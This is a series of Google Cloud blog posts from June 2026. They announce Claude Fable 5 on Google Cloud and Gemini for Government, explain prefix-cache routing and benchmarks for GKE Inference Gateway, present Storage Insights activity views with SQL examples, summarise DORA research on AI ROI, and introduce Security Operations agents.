Cloud Blog

Claude Fable 5: Available on Google Cloud

Tue, 09 Jun 2026 18:00:00 +0000

Claude Fable 5, Anthropic’s latest frontier model, is now generally available on Google Cloud. This launch is the latest proof point of our ongoing commitment to bringing the industry's newest models straight to our Agent Platform.

Claude Fable 5 brings the best of Anthropic’s model capabilities to all customers, with strong safeguards designed to make it safe for general use. Built for complex, multi-step reasoning, it is well suited to demanding tasks such as advanced software development, long-horizon agents, and deep multimodal document analysis. For more information about this release, visit Anthropic’s blog.

Build with Claude Fable 5 and other models from Anthropic — including Claude Opus 4.8 and Claude Sonnet 4.6 — today on Agent Platform.

Gemini for Government: Your blueprint for mission impact

Tue, 09 Jun 2026 17:00:00 +0000

The public sector has reached a critical inflection point. For years, organizations have explored what’s possible through isolated AI pilots and experiments. Today, the question has shifted to “what creates impact?” The focus is no longer on hypotheticals but on achieving real productivity gains, improving services and outcomes, and advancing your mission right now. Meeting this moment requires more than a powerful model: it requires an integrated approach with the security, reliability, scale, and cost-efficiency that public sector missions demand.

Today, public sector organizations are moving swiftly from AI assistants and chatbots to a full-scale agentic taskforce. Here’s how they are doing it.

Building on a unified foundation

To move AI and agents into production at scale, you need to remove the friction of integration. Google Cloud offers a complete AI stack designed to work as one unified system. We believe this integrated stack is the engine for true transformation in the agentic era.

Let’s take a closer look at this integrated stack:

It all starts with the AI Hypercomputer, our purpose-built infrastructure foundation, optimized for the physics and scale of the agentic era and powered by both GPUs and TPUs. We continue to invest in this portfolio and made several announcements at Cloud Next ’26, including the launch of our eighth-generation TPU and updates to our cross-cloud infrastructure with new innovations across fluid compute, secure cross-cloud connectivity, the unified data layer, and digital sovereignty.
We deliver research from Google DeepMind as well as frontier models to provide intelligence with speed and efficiency. We offer choice across Google’s leading models, like our recently announced Gemini 3.5, alongside other open and third-party options.
Our agentic data cloud grounds your AI in trusted, real-time organizational truth and context. We help you build a 'system of action' with our latest breakthroughs announced at Cloud Next ’26, including the Cross-cloud Lakehouse and Knowledge Catalog.
With our agentic defense, you get zero-trust protection that secures your entire AI lifecycle from code to cloud. To help you navigate the agentic era securely, we recently launched Google AI Threat Defense, an automated security system designed to help you continuously monitor for and stop AI-powered threats before they can impact your organization.
At Cloud Next ’26, we unveiled Gemini Enterprise Agent Platform, our comprehensive platform to build, scale, govern and optimize agents with architectural rigor. This platform brings together model selection, model building, and agent building capabilities with new features for agent integration, development, orchestration, and security.
All of this comes together at the top with pre-built specialized agents and applications that are ready to transform your organization from day one. We announced new capabilities at Cloud Next ’26, including Workspace Intelligence, a secure and dynamic system that inherently understands complex semantic relationships within your Workspace apps (such as Docs, Slides, or Gmail), your active projects, your collaborators, and your organization's domain knowledge.

Delivering uncompromising security and control

For many public sector organizations, security is the mission. This new era of mission-ready and secure AI is defined by the ability to work across silos and legacy systems. IT system administrators have access to a built-in AI Control Dashboard, a single pane of glass to centrally visualize, secure, and audit the organization’s entire AI estate. Through Agent Registry, administrators maintain complete visibility into active agents and their grounded data sources, ensuring that every interaction stays within the strict guardrails of agency policy and security mandates. Model Armor provides comprehensive protections against prompt injection, sensitive data leaks, and harmful content. Built on a Zero Trust foundation, Gemini for Government includes FedRAMP High-authorized security and compliance features and is backed by a Data Privacy Guarantee stating that Google does not train its foundational models on customer data. At Google Cloud Next ’26, we introduced new development tools to secure AI-generated code and mitigate the risk of shadow AI, and also shared how we are protecting AI and cloud apps across any infrastructure with Wiz.

Scaling agents across the organization

In order to realize AI’s true potential, it must be in the hands of your people — caseworkers, inspectors, analysts and more. Google Public Sector was proud to be the first technology provider to offer an enterprise AI tool, Gemini for Government, through GenAI.mil to more than three million civilian and military personnel. We recently introduced a new feature within Gemini for Government on GenAI.mil called Agent Designer which enables DoW civilian and military personnel to build their own agents to support unclassified work tasks.

With Agent Designer, non-technical users can build sophisticated AI agents using natural language through no-code interfaces. Our goal is to provide the tools to empower everyone in the organization to build and use agents that connect securely to existing systems and enterprise applications. This is all about using AI and agents to automate manual and time-consuming tasks, improve productivity, and ensure you and your teams can apply your experience and judgment to the most critical aspects of your work.

Achieving tangible ROI

According to our recent ROI of AI in the public sector report, agentic and generative AI is already helping public sector teams get more done: 70% of public sector leaders report improved productivity from gen AI, and of those, 46% say employee productivity has at least doubled. This translates directly into faster response times, more efficient public services, and better overall outcomes. Gemini Deep Research Agent and NotebookLM are force multipliers for the public sector, transforming how complex research, deep work, and analysis are conducted.

Your blueprint for mission impact

With Gemini for Government, you can move beyond AI exploration and pilots to real-world applications and agents at scale. This is all about applying technology to amplify human capacity, accelerate strategic decision-making, and advance your mission.

Register to attend our Gemini for Government webinar on June 11 where we’ll dive deeper into how to leverage data, security, and an integrated AI stack. Whether you are looking to scale day-one use cases across your organization, empower your internal champions, or are just getting started, you will leave with a clear path forward to drive impact and advance your mission today.

Report: GKE Inference Gateway delivers up to 92% faster AI responses

Tue, 09 Jun 2026 16:00:00 +0000

As generative AI moves from experimental pilots to massive production environments, the efficiency of your infrastructure becomes the ultimate differentiator. One way to get the most out of it and minimize costly accelerator idle time is to leverage the Google Kubernetes Engine (GKE) Inference Gateway, which intelligently routes generative AI workloads based on real-time model server metrics.

Instead of relying on traditional, naive round-robin load balancing — which frequently triggers expensive accelerator recomputation and spikes user latency — this native extension of the GKE Gateway utilizes advanced capabilities like prefix caching and model-aware routing. By ensuring requests land on the exact accelerator that is primed to process them right away, GKE transforms how you can serve your large language models (LLMs), with excellent hardware utilization and ultra-fast response times.

In fact, according to an independent benchmark report, GKE Inference Gateway outperforms the next leading managed Kubernetes service with 15.7% higher throughput, 92.8% shorter wait times, and 62.6% lower inter-token latency. This performance takes LLM-based applications from sluggish and expensive to fast and production-grade.

That performance tracks with Snap’s experience using GKE Inference Gateway.

“At Snap, we are integrating llm-d into our production AI infrastructure to facilitate high-performance inference at scale. By employing prefix-cache-aware routing, we have achieved prefix cache hit rates ranging up to 75-80%. We appreciate the open-source nature of llm-d, as it enables seamless integration with our Envoy-based Service Mesh.” - Vinay Kola, Senior Manager, Software Engineering, Snap Inc.

In this blog, we take a closer look at GKE Inference Gateway’s prefix caching, complete with examples. We also provide more details about its benchmark results. Let’s jump in.

The secret to low-latency AI: Prefix caching

Prefix caching optimizes LLM performance by storing the KV cache (the attention key and value tensors computed during prefill) for long, repeated prompt prefixes. When consecutive user requests share the same system instructions, context, or documentation, the model server can skip reprocessing those tokens entirely. GKE Inference Gateway reads incoming request prefixes and routes them to the specific pods that already hold that data in memory. This removes repeated prefill work from your GPUs and TPUs, so responses to requests with long shared prefixes start much sooner.
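To make the routing idea concrete, here is a minimal Python sketch of prefix-cache-aware routing in general, not GKE Inference Gateway's actual scoring logic. It assumes prompts are already tokenized, hashes them in fixed-size blocks (each hash chained to the one before it, so a match means the whole prefix up to that block matches), and sends each request to the pod holding the longest run of matching blocks, breaking ties by queue depth. `BLOCK_SIZE`, `Pod`, `block_hashes`, and `pick_pod` are hypothetical names chosen for illustration.

```python
import hashlib
from dataclasses import dataclass, field

BLOCK_SIZE = 16  # tokens per cache block; hypothetical value for illustration


def block_hashes(tokens: list[int], block_size: int = BLOCK_SIZE) -> list[str]:
    """Hash each full block of tokens. Each hash also covers the previous hash,
    so equal hashes mean the whole prefix up to that block is identical."""
    hashes: list[str] = []
    prev = ""
    for start in range(0, len(tokens) - block_size + 1, block_size):
        block = ",".join(map(str, tokens[start:start + block_size]))
        prev = hashlib.sha256(f"{prev}|{block}".encode()).hexdigest()
        hashes.append(prev)
    return hashes


@dataclass
class Pod:
    name: str
    queue_depth: int = 0
    cached: set[str] = field(default_factory=set)

    def matched_blocks(self, hashes: list[str]) -> int:
        """Number of leading prefix blocks this pod already holds in cache."""
        count = 0
        for h in hashes:
            if h not in self.cached:
                break
            count += 1
        return count


def pick_pod(pods: list[Pod], tokens: list[int]) -> Pod:
    """Route to the pod with the longest cached prefix; on a tie, prefer the
    shorter queue. Queue depth is never decremented in this toy model."""
    hashes = block_hashes(tokens)
    best = max(pods, key=lambda p: (p.matched_blocks(hashes), -p.queue_depth))
    best.cached.update(hashes)  # after prefill, this pod holds the prefix's KV blocks
    best.queue_depth += 1
    return best


shared = list(range(64))  # stands in for a tokenized shared system prompt (4 blocks)
pods = [Pod("pod-a"), Pod("pod-b")]
print(pick_pod(pods, shared + [1000, 1001]).name)  # pod-a: cold start, tie goes to the first pod
print(pick_pod(pods, shared + [2000, 2001]).name)  # pod-a: it already holds the shared prefix
```

A production gateway would also weigh the real-time model server metrics mentioned earlier and evict stale cache entries; this toy keeps every block forever and never drains a queue.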

Use case 1: Documentation and codebase Q&A with retrieval-augmented generation (RAG)

When querying massive enterprise repositories with RAG, you can ground your LLM’s responses in entire documentation sets, pinned as static cached prefixes, without paying the latency of reprocessing them on every request.

Instead of forcing an LLM to re-read thousands of lines of API references or corporate wikis for every single user question, GKE Inference Gateway routes the query to a pod that already has that specific context warmed up in its KV cache. The LLM only has to compute the user's brief, dynamic question, completely bypassing expensive document re-evaluation.

```
[STATIC PREFIX - STAYS IN CACHE]
You are an expert AI assistant specializing in technical documentation. Below is the complete API documentation for our software platform. Use this context to answer the user's questions accurately. If the answer cannot be found in the documentation, say "I cannot find that in the provided context."

<documentation> [10,000+ words of API reference documentation, endpoints, error codes, etc.] </documentation>

[DYNAMIC SUFFIX - CHANGES PER REQUEST]
User Question: How do I handle a 429 rate limit error using the Python SDK?
```
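The static-prefix, dynamic-suffix layout matters because a cache can only reuse a prefix that is identical from the very first token. A minimal Python sketch, assuming a character-level comparison as a rough stand-in for token-level matching: `build_prompt` keeps the static text first, while the hypothetical `build_prompt_bad` puts a per-request ID at the top, which leaves almost nothing for two requests to share.

```python
import os

# Short stand-in for the long static prefix (instructions + documentation).
STATIC_PREFIX = (
    "You are an expert AI assistant specializing in technical documentation.\n"
    "<documentation> [API reference documentation] </documentation>\n\n"
)


def build_prompt(question: str) -> str:
    """Static prefix first, per-request text last, so every request shares the prefix."""
    return STATIC_PREFIX + "User Question: " + question


def build_prompt_bad(question: str, request_id: str) -> str:
    """Anti-pattern: a per-request value placed before the static text."""
    return f"Request ID: {request_id}\n" + STATIC_PREFIX + "User Question: " + question


def shared_prefix_chars(a: str, b: str) -> int:
    """Length of the common leading substring (a character-level proxy for tokens)."""
    return len(os.path.commonprefix([a, b]))


# Whole static prefix plus "User Question: " is shared.
print(shared_prefix_chars(build_prompt("How do I handle a 429?"),
                          build_prompt("What does a 401 mean?")))
# Only "Request ID: " is shared.
print(shared_prefix_chars(build_prompt_bad("How do I handle a 429?", "a1"),
                          build_prompt_bad("How do I handle a 429?", "b2")))
```

In practice, timestamps, user IDs, or retrieved snippets belong in the dynamic suffix, after the static instructions and documentation.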

Use case 2: Multi-turn chat

You can also use prefix caching to maintain customer service interactions across thousands of simultaneous sessions without compounding compute costs. You can do so by caching permanent system personas and core business rules directly on the LLM server.

In enterprise chat architectures, the base system prompt and reference tables remain completely identical across millions of customer interactions. GKE Inference Gateway handles these multi-turn conversations using context-aware routing to bypass repetitive token processing, so that your chatbot stays ultra-responsive even under peak traffic.

```
[STATIC PREFIX - STAYS IN CACHE]
System Persona: You are "FinBot", a helpful, empathetic, and compliant virtual assistant for ABC Banking Solutions. You must strictly adhere to the following rules: 1. Never provide concrete investment advice. 2. Always verify if the user is asking about checking or savings. 3. Keep your answers under 3 sentences. 4. If a user is angry, offer to connect them to a human manager.

Here is the current interest rate table for May 2026:
- Savings: 4.2% APR
- Checking: 0.5% APR
- CD (12-month): 5.1% APR

[DYNAMIC SUFFIX - CHANGES PER REQUEST]
User: Hi, I'm trying to figure out how much I'd make if I locked away $10,000 for a year?
```
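Multi-turn chat benefits for a related reason: if the conversation is rendered append-only (system prompt first, then each turn in order), every new request's prompt begins with the previous request's full prompt. The Python sketch below checks that property with a hypothetical `render` function and a shortened FinBot persona; real chat templates vary by model, and the property breaks if the history is truncated or summarized.

```python
SYSTEM = 'System Persona: You are "FinBot", a virtual assistant for ABC Banking Solutions.\n'


def render(system: str, turns: list[tuple[str, str]]) -> str:
    """System text followed by every turn in order (append-only rendering)."""
    return system + "".join(f"{role}: {text}\n" for role, text in turns)


def prompts_per_turn(system: str, turns: list[tuple[str, str]]) -> list[str]:
    """Prompt sent for each user turn: everything said up to and including it."""
    return [render(system, turns[: i + 1]) for i, (role, _) in enumerate(turns) if role == "User"]


conversation = [
    ("User", "Hi, how much would I make if I locked away $10,000 for a year?"),
    ("Assistant", "Are you asking about a savings account or a 12-month CD?"),
    ("User", "A 12-month CD."),
]
prompts = prompts_per_turn(SYSTEM, conversation)
# Each prompt begins with the previous one in full, so a pod that served the
# last turn only needs to prefill the newly appended turns.
print(all(b.startswith(a) for a, b in zip(prompts, prompts[1:])))  # True
```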

GKE outperforms alternative managed Kubernetes solutions

To validate these architectural advantages, Principled Technologies recently released an independent benchmark report comparing GKE (equipped with the GKE Inference Gateway) against a standard third-party managed Kubernetes service utilizing conventional round-robin HTTP load balancing.

In tests on a Llama 3.1 8B Instruct shared-prefix workload using identical hardware (eight NVIDIA A100 40GB GPUs), the results showed a large performance gap between the two Kubernetes services, with GKE ahead on three critical metrics:

Higher throughput: 15.7% more tokens processed per second, enabling higher request capacity or reduced hardware needs for the same workload
Much faster time to first token (TTFT): 92.8% shorter wait times, producing dramatically quicker perceived response starts for interactive scenarios
Lower inter-token latency (ITL): 62.6% reduction, resulting in smoother and faster token streaming after the first token

Figure 3: Mean latency (normalized time per output token) of GKE with GKE Inference Gateway and third-party managed Kubernetes service on the Llama 3.1-8B Instruct LLM on the Shared prefix use case. Both solutions used the same hardware. Source: Principled Technologies

Metric	GKE	Third-party managed Kubernetes service	GKE advantage
Mean output token throughput	7,169.21 output tokens per second	6,042.05 output tokens per second	15.7% more output token throughput
Mean time to first token (TTFT)	188.36 ms	2,624.73 ms	92.8% less TTFT
Mean inter-token latency (ITL)	30.20 ms	81.03 ms	62.6% lower ITL

Figure 4: GKE with GKE Inference Gateway delivered superior AI inference compared to a third-party managed Kubernetes service using standard HTTP LB.
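As a worked check on the benchmark table, the percentages can be recomputed from the published means. This Python sketch computes each difference against both baselines, because the direction of the comparison changes the number.

```python
# Mean values copied from the benchmark table (Principled Technologies).
GKE = {"throughput_tok_s": 7169.21, "ttft_ms": 188.36, "itl_ms": 30.20}
THIRD_PARTY = {"throughput_tok_s": 6042.05, "ttft_ms": 2624.73, "itl_ms": 81.03}


def pct_diff(value: float, baseline: float) -> float:
    """Percent difference of `value` relative to `baseline`."""
    return (value - baseline) / baseline * 100


def comparisons() -> dict[str, tuple[float, float]]:
    """Per metric: (GKE relative to third party, third party relative to GKE)."""
    return {
        m: (pct_diff(GKE[m], THIRD_PARTY[m]), pct_diff(THIRD_PARTY[m], GKE[m]))
        for m in GKE
    }


for metric, (vs_third_party, vs_gke) in comparisons().items():
    print(f"{metric}: GKE {vs_third_party:+.1f}% vs third party; "
          f"third party {vs_gke:+.1f}% vs GKE")
```

This reproduces the 92.8% TTFT reduction and gives about 62.7% for ITL from the rounded means (the report states 62.6%). The 15.7% throughput figure matches the gap expressed relative to GKE's throughput, that is, the third-party service delivered about 15.7% less; expressed relative to the third-party baseline, GKE's throughput is about 18.7% higher.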

Ready to accelerate your gen AI inference workloads?

Whether you’re deploying inference workloads such as real-time customer support agents, dynamic coding assistants, or sub-second fraud detection models, infrastructure latency dictates your user experience. By routing requests that share a prompt prefix to the pods that already hold it in cache, GKE Inference Gateway turns your LLMs from sluggish, expensive reasoning engines into fast, capital-efficient, production-grade services.

Ready to explore the performance advantage that GKE Inference Gateway can bring to your gen AI workloads? Access the full benchmark report here and watch this explainer video to learn more.

A special thanks to Dan Sullivan, Senior Performance Architect, Principled Technologies.

Storage Insights datasets: Enabling org-wide operational discovery with activity insights

Tue, 09 Jun 2026 16:00:00 +0000

As enterprise storage footprints scale to billions of objects, AI applications and agentic workloads are fundamentally shifting the role of storage from a passive repository to the foundation of the data platform. This is driven by a surge in unstructured model data and the billions of actions performed on those objects, including session logs and audit trails. To manage this and answer questions about cost, operations, and security, storage and platform admins need to go beyond knowing what data they have, to understanding exactly how it is being accessed, moved, and modified.

To help, we're excited to announce activity insights within Storage Insights datasets. Now generally available, these new views provide visibility into the operational details of your Google Cloud Storage assets, enabling data-driven cost optimization and faster troubleshooting. For example, with activity insights, you can answer questions like:

Are my objects located in the right storage classes within my buckets?
What regions is my bucket interacting with the most so I can assess if it is optimally located?
Where are there errors across operations on my storage estate and why?

Answering these questions confidently is the key to unlocking cost optimizations and reclaiming engineering time. Storage Insights datasets, a feature of Storage Intelligence for Cloud Storage, provides daily metadata and frequent activity insights (typically within four hours of the activity) so you have better visibility into your storage estate. While Storage Intelligence is a unified management product with capabilities like Bucket relocation, Batch operations and Gemini Cloud Assist, this blog focuses on how you can leverage Storage Insights datasets for operational optimization.

What are Storage Insights datasets?

Storage Insights datasets deliver an automated, query-ready BigQuery index of your entire storage estate, complete with raw metadata and activity insights, replacing manual, error-prone data collection. Storage Insights datasets can be customized in scope: create a dataset for your entire organization, a specific folder, one or more projects, or even specific buckets. The dataset then refreshes with regular updates, giving you a comprehensive view of your storage.

From static metadata to live intelligence

Storage Insights datasets are your go-to tool for understanding your storage metadata, acting as an inventory management tool, scanning object metadata (storage class, location, age, custom metadata) and organizing it into a powerful, queryable BigQuery-linked dataset. This is crucial for knowing what data you have (learn more about how to optimize storage spend with Storage Insights datasets here).

But what if you also knew how and when that data is being used?

Storage Insights datasets now offers a set of new views that capture:

Object-level activity, including writes, updates, deletes, and errors
Bucket-level aggregate activity, including total object operations, a breakdown by type of operations, total errors and most active prefixes
Bucket-level regional traffic activity, including ingress and egress bytes per region that interact with your bucket
Project-level aggregate activity, including total object operations, a breakdown by type of operations and total errors

This data flows directly into new BigQuery views within your dataset so you can run analytics queries for specific insights, interact with the data via Gemini or simply connect it to powerful Looker dashboards for visualization.

This moves you from a static snapshot to a dynamic, queryable analysis of your data's entire lifecycle. It's the difference between knowing what's in your warehouse and knowing what’s used and when.

Three ways to use activity insights immediately

Here’s what you can do, starting today, with activity insights in Storage Insights datasets.

1. Right-size your storage estate

The challenge: You have terabytes of data in Standard or Nearline class storage that you believe is cold. But without proof, moving it to Coldline or Archive class is risky. What if a critical process still needs to read it once per quarter?
The solution: With the new Storage Intelligence views that surface activity insights, you can now identify buckets that have had minimal read/write activity over the last 30, 60, or 90 days.
The outcome: Apply or fine-tune lifecycle policies to transition this data to more cost-effective storage classes.

For example, here’s a SQL query that ranks the buckets in your estate by total requests over roughly the last six months, least active first:

```sql
-- Sum activity across all snapshots in the window so each bucket appears once,
-- then list the least active buckets first.
SELECT
  name,
  location,
  project,
  SUM(totalRequests) AS total_requests
FROM
  `[project]`.`[dataset]`.`bucket_activity_view`
WHERE
  snapshotEndTime >= TIMESTAMP(DATE_SUB(DATE_TRUNC(CURRENT_DATE(), MONTH), INTERVAL 5 MONTH))
  AND snapshotEndTime < CURRENT_TIMESTAMP()
GROUP BY
  name,
  location,
  project
ORDER BY
  total_requests ASC;

-- Running queries in Datasets accrues BigQuery query costs; refer to the pricing page for details.
```
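To check the 30-, 60-, and 90-day windows from the solution above in one pass, you could export per-bucket, per-day request counts and filter them in Python. This is a minimal sketch: the input shape, bucket names, counts, and the threshold of 10 requests are hypothetical, and the activity views' actual granularity may differ.

```python
from datetime import date, timedelta


def idle_buckets(daily_requests: dict[str, dict[date, int]], today: date,
                 window_days: int, max_requests: int) -> list[str]:
    """Buckets with at most `max_requests` requests in the `window_days`
    days before `today` (today itself excluded), sorted by name."""
    start = today - timedelta(days=window_days)
    idle = []
    for bucket, by_day in daily_requests.items():
        total = sum(n for day, n in by_day.items() if start <= day < today)
        if total <= max_requests:
            idle.append(bucket)
    return sorted(idle)


# Hypothetical per-day request counts per bucket.
usage = {
    "logs-archive": {date(2026, 1, 15): 3},
    "app-assets": {date(2026, 6, 1): 5000},
    "quarterly-reports": {date(2026, 4, 1): 40},  # read once per quarter
}
for window in (30, 60, 90):
    print(window, idle_buckets(usage, date(2026, 6, 9), window, max_requests=10))
```

Here `quarterly-reports` looks idle over 30 and 60 days but not over 90, which is exactly the once-per-quarter reader the challenge warns about; choosing a window longer than your slowest known access cycle helps avoid moving such data too early.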

2. Architect for global performance with data-driven bucket placement

The challenge: Your team set up a multi-region bucket to serve a global application. But a year later, is that still the right architecture? What if 99% of your traffic is now coming from a single region?
The solution: Analyze the access patterns in the new bucket_region_activity_view. You can easily pinpoint which regions are driving read and write activity for the bucket.
The outcome: Make data-driven decisions to co-locate your bucket with your compute. You might find that changing a multi-region bucket to a single-region one (or vice versa) can lead to significant cost savings and even improve performance.

For example, here’s a SQL query to break down the egress and ingress traffic pattern for a bucket across regions:

```sql
SELECT
  requestLocation,
  bucketLocation,
  SUM(requestBytes) AS total_request_bytes,
  SUM(responseBytes) AS total_response_bytes
FROM
  `[project]`.`[dataset]`.`bucket_region_activity_view`
WHERE
  name = '[bucket name]'
GROUP BY
  requestLocation,
  bucketLocation;

-- Running queries in Datasets accrues BigQuery query costs; refer to the pricing page for details.
```
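Once the query returns per-region byte totals, a small calculation answers the "is 99% of my traffic coming from one region?" question. A minimal Python sketch, assuming you sum `total_request_bytes` and `total_response_bytes` per `requestLocation`; the region names, byte counts, and the 90% threshold are hypothetical.

```python
from typing import Optional


def region_shares(bytes_by_region: dict[str, int]) -> dict[str, float]:
    """Fraction of total bytes attributed to each request region."""
    total = sum(bytes_by_region.values())
    if total == 0:
        return {region: 0.0 for region in bytes_by_region}
    return {region: n / total for region, n in bytes_by_region.items()}


def dominant_region(bytes_by_region: dict[str, int], threshold: float = 0.9) -> Optional[str]:
    """Region carrying at least `threshold` of all bytes, or None if traffic is spread out."""
    shares = region_shares(bytes_by_region)
    if not shares:
        return None
    region, share = max(shares.items(), key=lambda kv: kv[1])
    return region if share >= threshold else None


# Hypothetical totals (request + response bytes) per requestLocation for one bucket.
print(dominant_region({"us-central1": 990, "europe-west1": 6, "asia-east1": 4}))  # us-central1
print(dominant_region({"us-central1": 500, "europe-west1": 500}))                  # None
```

A dominant region is a candidate for co-locating the bucket with that region's compute; traffic spread evenly across regions is a reason to keep a multi-region bucket.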

Shipt, a retail technology platform and same-day delivery service, has been using Storage Intelligence capabilities to inform their data location decisions:

“Storage Intelligence enables us to efficiently manage over 2 billion objects, delivering cost and performance optimization. With Insights datasets, we detected and analyzed egress charges from multi-region buckets, identifying opportunities to improve efficiency by co-locating compute and storage. By leveraging the Bucket Relocate capability, we seamlessly moved 1.3 Petabytes of data from multi-region to regional storage, achieving substantial cost savings while maintaining uninterrupted application performance and data pipeline continuity.” - Ron Cuirle, Director of Engineering - Cloud Platforms, Shipt

3. Demystify and resolve operational hotspots

The challenge: Your team sees a spike in 429 (too many requests) errors. In a massive environment, this is rarely just a performance hiccup — it’s expensive! These errors trigger automatic retries, which often lead to a cycle of high-frequency, billable operations that drive up your Class A costs. Pinpointing exactly which object or prefix is causing this can be a time-consuming troubleshooting nightmare.
The solution: The new Storage Insights datasets views provide granular details on these errors, right in BigQuery. You can query for 429 errors and see exactly which objects and prefixes are under pressure.
The outcome: Pinpoint the cause of your 429 errors and move your team from troubleshooting to resolution.

For example, here’s a SQL query to analyze 429s occurring across your estate, where they are happening and why:

```sql
SELECT
  requestOperation,
  errorReason,
  objectName,
  bucketName,
  requestCompletionTimestamp,
  project
FROM
  `[project]`.`[dataset]`.`object_events_view`
WHERE
  responseStatus = 429
ORDER BY
  requestCompletionTimestamp DESC;

-- Running queries in Datasets accrues BigQuery query costs; refer to the pricing page for details.
```
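Individual 429 rows are easier to act on once grouped. This Python sketch, assuming the `bucketName` and `objectName` columns from the query have been exported as pairs, counts errors per bucket and top-level prefix; `prefix_of`, `hotspots`, and the sample rows are hypothetical.

```python
from collections import Counter


def prefix_of(object_name: str, depth: int = 1) -> str:
    """First `depth` path segments, e.g. prefix_of("thumbs/2026/a.jpg") == "thumbs/"."""
    parts = object_name.split("/")
    if len(parts) <= depth:
        return ""  # no folder-style prefix at this depth
    return "/".join(parts[:depth]) + "/"


def hotspots(rows: list[tuple[str, str]], depth: int = 1,
             top: int = 3) -> list[tuple[tuple[str, str], int]]:
    """Count 429 rows per (bucketName, prefix) and return the `top` most frequent."""
    counts = Counter((bucket, prefix_of(obj, depth)) for bucket, obj in rows)
    return counts.most_common(top)


# Hypothetical (bucketName, objectName) pairs from the 429 query.
rows = [
    ("media", "thumbs/2026/1.jpg"),
    ("media", "thumbs/2026/2.jpg"),
    ("media", "thumbs/2026/3.jpg"),
    ("media", "raw/9.mov"),
    ("logs", "app/x.log"),
]
print(hotspots(rows))
```

Raising `depth` narrows the view from `thumbs/` to `thumbs/2026/` once you know which branch of the namespace is under pressure.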

Getting started

As your organization grows with Google Cloud, the scale of your data will only increase. Stop relying on archival data and start optimizing your organization’s storage estate. Storage Insights datasets with activity insights turn massive data estates from complex operational challenges into clearly understood, highly optimized assets.

To get started, use our pre-configured Looker Studio template here to connect to your dataset for quick analysis and value:

For example: View the trend for Total Reads on your bucket over time

Or, analyze the ingress and egress traffic patterns for your bucket:

Ready to turn insight into action?

Enable Storage Intelligence today in the Google Cloud console.
Configure your dataset today and query your data directly in BigQuery or connect to our Looker template for quick and easy visualization.
Reference our videos for more information on Storage Intelligence and How to Get Started.
Read more about how to optimize your Cloud Storage footprint with Storage Insights datasets.

How to unlock true ROI in software development – a deep dive into the latest DORA research

Tue, 09 Jun 2026 16:00:00 +0000

How do you prove the business value of generative AI to your teams?

Technology and finance leaders need to show the clear business value of AI projects to secure ongoing funding. While measuring return on investment (ROI) is a key part of validating your technical strategy, long-term success ultimately depends on building the organizational systems and culture needed to make AI work.

To help you evaluate the costs and business benefits of AI, we recently shared the DORA: ROI of AI-assisted software development report. This research offers a practical approach to help your team work through early adoption challenges, align engineering plans, and drive business growth.

Here are the key findings from the report, and how you can use them to support your overall technology strategy.

Insight #1: Navigating the J-curve of AI value realization

It is important to be realistic about how quickly you will see a return on your AI investments. While AI can act as a powerful amplifier for software engineering, the path to financial value is rarely a straight line. Most organizations will instead encounter a J-curve: a temporary productivity dip and period of instability associated with early adoption.

This temporary drop is a normal part of adopting new technology, rather than a sign of a failing strategy. The report points to three main reasons why this happens:

The learning curve: Teams require dedicated time away from regular feature delivery to adapt their daily workflows and master advanced techniques, evolving from simple prompting to building systems based on context and intent.
The verification tax: Because AI dramatically increases the sheer volume of code produced, developers must invest extra time rigorously reviewing generated outputs to ensure trustworthiness, prevent hallucinations, and meet internal architectural standards.
Pipeline adaptation: As individual developers generate code significantly faster, downstream processes like testing and change approvals often become bottlenecks and must be actively scaled to handle the increased throughput.

Budgeting for this initial learning phase is key to making the transition work. By anticipating this temporary drop in productivity, you can confidently keep your AI projects moving forward, knowing that these early challenges are an investment in your team's long-term speed.

The J-Curve of AI value realization
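The J-curve can be illustrated with a toy cumulative-value model. This is not the DORA report's or the ROI calculator's methodology, and all parameters are hypothetical: productivity starts below baseline during the learning phase, ramps linearly to a steady gain, and a fixed monthly cost is subtracted throughout.

```python
def cumulative_net_value(months: int, monthly_cost: float, steady_gain: float,
                         dip: float, ramp_months: int) -> list[float]:
    """Running total of (productivity gain - cost) per month. The gain starts
    `dip` below baseline and rises linearly to `steady_gain` by `ramp_months`."""
    total = 0.0
    series = []
    for month in range(months):
        progress = min(month / ramp_months, 1.0)
        gain = -dip + (steady_gain + dip) * progress
        total += gain - monthly_cost
        series.append(total)
    return series


# Hypothetical figures in arbitrary currency units per month.
values = cumulative_net_value(months=12, monthly_cost=10, steady_gain=40, dip=20, ramp_months=6)
print([round(v) for v in values])  # [-30, -50, -60, -60, -50, -30, 0, 30, 60, 90, 120, 150]
```

With these inputs, cumulative value bottoms out at months 2 and 3 and returns to zero at month 6 (months counted from 0), which is the kind of initial dip the budgeting advice above is meant to cover.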

Insight #2: Understand the market divide on AI returns

DORA’s state of AI-assisted software development report shows that 90% of DORA survey respondents report using AI at work. Despite nearly universal adoption, actual financial impacts vary across organizations. Across the market, some companies see clear value from their engineering investments, while others struggle with unexpected costs.

When a project falls short, it’s often because the team lacks the organizational support to make it work. To get the returns you expect, you need to prepare your workflows and teams to adopt the new technology.

Insight #3: Calculating your AI ROI is essential

Building a realistic financial model for AI starts with looking at where it actually adds value. Across the software development lifecycle, AI can help your team reduce costs, boost productivity, improve security, and deliver a better experience for both developers and users.

To assist in modeling this for your organization, you can use this interactive ROI calculator.

This tool helps you explicitly forecast both the visible expenses and the hidden realities of AI adoption.
You can explore the mechanics, adjust the assumptions to match your reality, and build your own estimate.

The value model—from adoption to ROI

Get started

Download the full report: Explore the complete framework to quantify your AI investments, navigate the J-Curve, and map your AI investment roadmap.
Try out the interactive ROI calculator: Visit https://dora.dev/ai/roi/calculator to estimate your organization's potential returns and build a defensible business case.
Watch this Cloud OnAir webinar: From cost center to value engine: Building your business case for AI-assisted development.

Detecting and containing AI-powered threats with Google Security Operations agents

Tue, 09 Jun 2026 16:00:00 +0000

To defend against the growing range of AI-accelerated threat actors, organizations need to be able to respond faster to outpace the adversary.

Recently, we announced Google AI Threat Defense, an automated security system designed to help you continuously monitor for and stop AI-powered threats before they can impact your business. Based on Google’s own approach to today’s threats and vulnerability management, it’s centered on a four-step framework: Prepare, scan and prioritize, remediate, and monitor.

Today, we’re sharing more details on how Google Security Operations works in concert with AI Threat Defense to monitor, detect, and respond to threats, particularly from code you do not own or cannot patch. This remediation gap represents a critical vulnerability.

According to M-Trends 2026, the exploitation of vulnerabilities has become the most common initial infection vector. Notably, the report also indicates that the mean time to exploit has dropped to an estimated minus seven days, meaning exploitation frequently occurs even before a patch is officially released. Google Security Operations provides the operational fabric needed to autonomously contain active attacks across your entire environment.

Google Security Operations supports AI Threat Defense to monitor, detect, and respond to threats.

